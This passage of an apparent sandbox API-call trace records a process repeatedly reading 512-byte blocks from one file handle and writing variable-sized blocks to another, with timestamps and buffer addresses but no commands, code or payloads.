lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.057] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.058] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.058] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.059] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.059] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.060] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.060] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.061] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.061] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.061] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.062] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.062] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.063] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.063] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.064] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.064] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.065] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.065] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.066] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.067] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.069] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.069] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.070] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.070] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.071] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.071] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.072] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.072] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.073] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.073] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.074] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.074] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.074] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.075] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.075] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.076] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.076] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.077] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.077] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.078] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.078] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.079] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.079] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.080] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.080] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.080] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.081] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.081] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.082] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.082] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.083] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.083] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.084] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.084] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.085] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.085] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.086] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.086] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.087] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.087] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.088] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.088] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.088] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.089] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.089] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.090] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.090] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.091] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.091] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.092] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.092] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.093] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.093] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.094] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.094] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.095] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.095] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.096] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.096] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.097] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.097] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x303, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.097] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.098] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.099] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.099] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.100] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.100] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.101] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.101] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.102] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.102] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.103] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.103] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.104] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.105] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.105] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.106] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: 